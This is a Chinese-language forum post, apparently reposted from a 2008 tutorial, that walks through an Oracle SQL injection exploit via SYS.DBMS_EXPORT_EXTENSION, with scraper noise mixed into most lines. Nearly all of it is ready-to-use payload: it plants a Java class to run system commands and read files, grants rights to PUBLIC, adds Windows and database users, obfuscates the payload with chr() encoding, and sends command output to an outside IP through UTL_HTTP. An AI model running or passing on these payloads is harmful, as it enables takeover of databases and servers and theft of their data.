以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
' Q2 x; Q4 K/ L4 f; D
; L# B1 I/ X- y+ N. F /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
1 R( j |1 y, b, M! @的形式即可。(用" 'a'|| "是为了让语句返回true值)
' k# t& U7 ]9 D8 ]8 L7 j8 L语句有点长,可能要用post提交。 4 y. n3 @: o4 O( `2 S& q3 ~+ V
以下是各个步骤: 3 H; L, v, s8 q7 [' P! B
1.创建包 ' q& s$ Z \# o# H) R8 U
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
8 M1 d- Y/ p% r. \. C' b/xxx.jsp?id=1 and '1'<>'a'||( ) L2 k: U8 D; g6 ], D5 p+ v
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 E8 j$ ~# n& B: y/ A: C4 z X4 Wcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
) s$ [ ^" u' O# f& P! Qnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}3 x' q0 a! g1 y
}'''';END;'';END;--','SYS',0,'1',0) from dual
4 k4 |& _) j- y4 K! W)
/ _. s4 {$ n) Z$ M* `/ n------------------------
% H. Q7 k0 K: d+ l如果url有长度限制,可以把readFile()函数块去掉,即: 9 E% c. Z$ p4 N
/xxx.jsp?id=1 and '1'<>'a'||( & Z5 m! T! j3 k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* M9 O5 N3 T. i r# h
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
& j* ?3 c: v, m6 Xnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
3 a" a- B% I; R}'''';END;'';END;--','SYS',0,'1',0) from dual
1 l' l. h! v s) 4 c7 n: j/ r' C" p9 g, K% o$ Y
同时把后面步骤 提到的 对readFile()的处理语句去掉。
$ s, H4 ~! y: ?' k- C/ M------------------------------ & l; _. _4 j' t# x; W
2.赋Java权限 3 c+ [# L# [5 \. U" k C( b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual; `, X& Y. T6 O' e" W8 o, X O* J
3.创建函数
1 H1 k- [% _8 m+ y. A% y9 G+ @# @select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 K8 _" ]0 p5 R4 B! @; pcreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
8 F6 q/ W8 c' T& c& z4 ~+ hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''7 {5 H5 M" y/ R' J
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual
9 S8 ^: u' v! F2 _2 T1 I e- o7 |4.赋public执行函数的权限 7 q# G) d# a% M( V4 O) y# ~2 w7 x2 I
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
$ q+ V ~+ m6 X6 I8 u# {0 M# rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual5 C: e+ B& g2 ]# n
5.测试上面的几步是否成功
7 {5 \+ I& X" s$ g9 H0 m# v. Nand '1'<>'11'||(
9 E! Y$ q+ o# a0 {$ Y* e9 J) L' Cselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
. t$ F0 g* P( }4 J* o; C t)
8 Q2 {. V6 a8 _$ L: Z* O; {; Eand '1'<>( ) i7 h4 O, Y/ s) V1 C$ G4 S- w
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
- y @5 E5 K' j* U, A) 0 a' M4 `6 e8 V. S; y+ V
6.执行命令: 7 i4 f6 K. K `* _0 j$ }3 x% h S
/xxx.jsp?id=1 and '1'<>( 6 h' X+ J3 G$ c$ \/ J; w
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
4 O6 Q E+ T- w' g" }- E( ]
9 g9 d$ v: j6 K9 ]3 X3 |! W) / ]5 I# U/ g+ k
/xxx.jsp?id=1 and '1'<>( + V- i7 ~1 e) \
select sys.LinxReadFile('c:/boot.ini') from dual
% J' c* b' y& j: Q/ m5 g
& j, j% `4 u f4 x)
+ ?; ]/ s+ E) x4 ?& D 1 T( D5 ]- {# i; O
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
- U1 ?: _; A$ E如果要查看运行结果可以用 union :
8 y9 Q% [( N+ n* C/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual2 t& @: X( S4 W1 G7 Y
或者UTL_HTTP.request(: 8 j* }2 H9 L( P3 {' j
/xxx.jsp?id=1 and '1'<>(
8 H1 f# b( s5 y0 F0 E, `SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual- V( |' L2 U: W% Y3 ? a$ P
) a1 \$ Y8 Q" e% H% W
/xxx.jsp?id=1 and '1'<>(
, P. U4 o# I6 ?! z- S$ rSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
8 Z$ ? F* I3 k) l5 M s$ N)
# l( V) [, B. I! n& |注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
% Q2 k5 ^7 Q$ E# v/ x--------------------
- Y7 r) H! x0 Z! V4 c2 t! a1 _! F6.内部变化
v1 w C5 n, |" t* L- M: I通过以下命令可以查看all_objects表达改变:
: E! m& E" R7 Q) l2 ?5 ^) Lselect * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'" S( e$ F; x; X" ~" E
7.删除我们创建的函数 # R4 {0 V! G! ]; @
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
& ^( K J! d2 G- ?6 X- O, Ddrop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual , C! ~9 {( h; F+ n& s+ |/ f( a6 s- @
==================================================== , g2 L# ^# k% B' q. ~: k
全文结束。谨以此文赠与我的朋友。
+ v5 C' o2 k- ?5 ^! nlinx
- b+ ?% [. S$ ]! N, I124829445
+ W2 E6 c9 A' `- s: F, e2008.1.12 # S1 n. [6 r6 k7 s8 y/ w# d2 `
linyujian@bjfu.edu.cn ; K" @( G+ f" x
====================================================================== - n/ W4 ~6 n# r |1 Z0 F- K' @6 l; S6 T
测试漏洞的另一方法: - x5 F a: b1 d
创建oracle帐号:
h( o4 z5 x# I' n2 q) I( ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" O% T) C' Y4 Y/ m$ `CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual8 q7 B# \2 b: j$ D6 R
即: & V3 e! `* i* V1 {4 d
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),& _5 [# g7 S8 ~3 m! }5 u
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual , x, P8 ~7 B7 `/ s' ?
确定漏洞存在: 9 h0 U4 a5 n. @0 ]2 O
1<>(
! T z" g' _5 A) Sselect user_id from all_users where username='LINXSQL' 7 I/ u3 z2 z* d, b: w n
) $ B$ K$ P+ S6 r+ [8 \4 ^. ~& }0 m8 p
给linxsql连接权限: % D+ ]& T- r& d H
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) ]# P* ], ?, O/ a x/ }$ F0 u1 d% OGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual . j3 h: r$ E8 P7 {! b+ v' R! o
删除帐号: 7 i6 @$ T% ^! K% T) M
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ S. {7 t a. M) Qdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual : q% }- j' ~/ k6 j5 a
======================
" \- d* G+ ?+ H" U2 S/ ~ H以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
7 X8 A& c$ {& H2 [6 g: x ~9 b1.jsp?id=1 and '1'<>(
: p/ I( T9 Y4 Jselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''6 o, A; n- a) t
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual5 s9 m/ f+ A/ Y1 S6 s' Q
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE- H5 [9 m$ G F8 @9 o3 q, Y- `
)% I" q* E) @4 w- L) x- Z! E
$ _6 d9 Y. }& w9 n! o7 O* f M; O( D- T9 g
$ i: f$ H1 W' g# w$ s# [ |
发表于 2012-12-18 12:21:48
收藏
支持
反对